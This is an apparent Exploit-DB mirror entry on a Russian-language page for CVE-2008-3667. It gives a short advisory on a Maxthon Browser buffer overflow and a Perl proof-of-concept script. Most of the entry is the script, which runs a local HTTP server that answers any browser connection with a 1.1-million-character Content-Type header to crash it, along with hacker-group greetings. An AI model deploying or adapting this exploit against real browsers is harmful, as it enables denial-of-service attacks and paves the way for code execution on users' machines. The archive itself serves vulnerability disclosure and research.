- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32197
- Проверка EDB
-
- Пройдено
- Автор
- DATA_SNIPER
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2008-3667
- Дата публикации
- 2008-08-09
Код:
source: https://www.securityfocus.com/bid/30617/info
Maxthon Browser is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Maxthon Browser 2.0 are vulnerable.
#!/usr/bin/perl # Maxthon Browser << 2.0 Stack Overflow Crash # Descoverd by DATA_SNIPER # Usage: #connect from maxthon browser to http:/127.0.0.1/
use IO::Socket;
my $sock=new IO::Socket::INET (
Listen => 1,
LocalAddr => 'localhost',
LocalPort => 80,
Proto =>
'tcp'); die unless $sock;
$huge="A" x 1100000;
$|=1; print "===================================================================\n";
print " Mawthon Browser << 2.0 Stack Overflow Crash\n";
print " Bug Descoverd by DATA_SNIPER\n";
print " GreetZ To:Alpha_Hunter,Pirat Digital,Xodia,DelataAzize,AT4RE Team,all algerian hackers\n";
print " Mail me at:Alpha_three3333(at)yahoo(dot)com\n"; print " BigGreetZ To: www.at4re.com,www.crownhacker.com\n";
print"===================================================================\n"; print " [+] HTTP Server started on port 70... \n";
print" [+]Try IExplore http://127.0.0.1/ \n";
$z=$sock->accept(); print " [+]connection
Accepted!\n";
do
{
$ln=<$z>;
print $ln;
chomp $ln;
if (($ln eq "")||($ln eq "\n")||($ln eq "\r"))
{
print " [<>]Sending Evil Packet\n";
print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone";
close($z);
exit;
}
} while (true);
- Источник
- www.exploit-db.com